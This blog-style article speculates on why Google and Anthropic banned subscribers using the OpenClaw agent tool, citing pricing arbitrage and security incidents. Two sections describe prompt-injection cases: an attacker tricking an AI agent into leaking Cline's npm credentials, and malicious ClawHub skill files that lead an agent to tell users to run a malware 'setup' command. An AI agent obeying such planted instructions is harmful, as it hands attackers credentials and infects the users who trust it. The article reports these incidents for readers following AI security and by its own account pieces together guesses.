You know something’s wrong when companies start banning their own paying customers without explanation.
Last week, Google restricted access for some AI Ultra users (those paying $250/month). Anthropic made similar moves with Claude Pro subscribers around the same time. The connection? Both were targeting people using OpenClaw.
OpenClaw, if you haven’t heard of it, is this third-party tool that turns AI chatbots into automation agents. Instead of just asking Claude questions, you can have it control your computer, run tasks, fill out forms—stuff like that. Developers loved it. Until both companies suddenly decided it violated their terms of service.
What’s frustrating is how vague both companies have been about the actual reasons. Google cited “misuse of OAuth authentication.” Anthropic updated its terms to prohibit third-party “harnesses.” But neither explained what specific security issues, if any, triggered the sudden enforcement.
I started digging into what might be behind the crackdown. Some security researchers have raised concerns about how OpenClaw handles permissions and credentials. There are questions about the plugin ecosystem. And there’s been discussion in developer communities about whether the tool’s architecture creates risks that the AI companies couldn’t ignore.
So here’s what we know, what’s still unclear & the four reasons that likely pushed AI companies to draw the line.
Reason 1: The Loophole That Cost Millions
Google and Anthropic both cited “OAuth violations” in their ban notices. But multiple reports suggest the real driver was economics.
OpenClaw lets you run automation using consumer subscriptions—Claude Pro at $20/month or Google AI Ultra at $249.99/month. Those plans are meant for casual personal use: writing emails, chatting, light research. Some users weren’t using them that way. They were running industrial-scale operations—processing thousands of documents, keeping agents running 24/7, automating workflows that would normally cost $5,000 to $20,000 per month through official APIs, according to The Register.
Anthropic internally called this “token arbitrage,” per The Register’s reporting. Users found a gap between cheap consumer pricing and expensive API rates, then drove a truck through it.
Google had the same problem. AI Ultra at $249.99/month was designed for power users, not enterprises. But some subscribers were extracting compute value equivalent to business contracts costing tens of thousands more.
Both companies had to pick either keep absorbing losses or shut down third-party access. They chose to shut it down.
What’s frustrating is the lack of transparency. Neither company explained the economics piece publicly. They just cited vague terms-of-service violations and started locking accounts—even for people who’d been paying subscribers for over a year.
Reason 2: Security Concerns
According to reports from Kaspersky, Snyk, and Palo Alto Networks, OpenClaw’s design creates what they call a “lethal combination”: it can read your local files, communicate with any website, and run terminal commands on your computer. All three at once.
On January 30, 2026, researchers disclosed CVE-2026-25253—a vulnerability that lets attackers take control of OpenClaw with a single malicious link. According to SOCRadar and other security firms, clicking the link is enough. The attacker steals your authentication token and can execute commands on your system.
OpenClaw patched it in version 2026.1.29. But scans by Censys found over 21,000 exposed instances online, many still running vulnerable versions.
For Google and Anthropic, this created a liability problem. A compromised OpenClaw instance means a compromised user account on their platforms. Attackers could use those accounts to spread phishing or scrape data, all tied to their infrastructure.
The companies didn’t explain this publicly. But Anthropic’s ban started February 18, less than three weeks after the vulnerability disclosure. Google followed shortly after.
Reason 3: The Supply Chain Attack That Made OpenClaw a Security Red Flag
This one’s where it gets genuinely weird.
On February 17, 2026, someone hijacked a popular developer tool called Cline, a CLI package downloaded by thousands of developers & used it to silently install OpenClaw on their machines. No warning, Just you updated your tools, and now you have OpenClaw.
According to The Hacker News, the attacker pulled this off by stealing Cline’s npm publishing credentials through a prompt injection, tricking an AI agent into handing over the keys. Around 4,000-5,000 installs happened in an eight-hour window before anyone noticed.
OpenClaw itself wasn’t doing anything malicious in this case. But that’s almost beside the point.
This matters for our story: when Google and Anthropic see OpenClaw show up on a user’s account, they can’t easily tell why it’s there. Was it installed intentionally? Or did someone’s machine get compromised in a supply chain attack?
From their perspective, that’s not a risk worth taking.
Also Read: 5 Open-Source Discord Alternatives That Don’t Care Who You Are
Reason 4: The “ClawHub” Malware Problem
OpenClaw isn’t just a tool, it’s an ecosystem. And that ecosystem has a marketplace called ClawHub where anyone can publish “skills” that give your AI agent new abilities.
That sounds great but there is a catch.
Snyk researchers recently dug into ClawHub and found something that would make any security team nervous: malicious skills designed to trick you into installing malware.
The attack works by having your AI agent read a skill’s instruction file, then politely ask you to run a setup command. You trust your agent. You paste the command. Done.
One active campaign was distributing a fake Google integration skill. The skill looked legitimate. The AI read it, followed the instructions, and told users to download a required utility But that utility was malware.
ClawHub has since added some safeguards, new accounts have a waiting period, flagged skills get auto-hidden. But the researchers found that clones reappear within hours of takedowns.
For Google and Anthropic, this wasn’t something they could look away from. A tool with an open marketplace actively being used to distribute malware, connected to accounts on their platforms, that’s not a “wait and see” situation. That’s a liability you cut off.
So what actually happened?
Honestly? We still don’t know for sure.
Google & Anthropic never gave a proper explanation. Paying customers got locked out, terms quietly updated, and that was it. No breakdown.
Everything in this piece comes from security researchers, developer forums, and reporting from places like The Hacker News and The Register trying to connect dots after the fact. I’m doing the same thing. The token arbitrage, the CVE, the supply chain attack, the ClawHub mess — any one of these could’ve been enough. My guess is several landed at once and the decision made itself.
What bothers me most isn’t the ban. It’s that people who’d been paying subscribers for over a year got no explanation. Just a policy update and silence.
Maybe that’s the part worth being annoyed about.




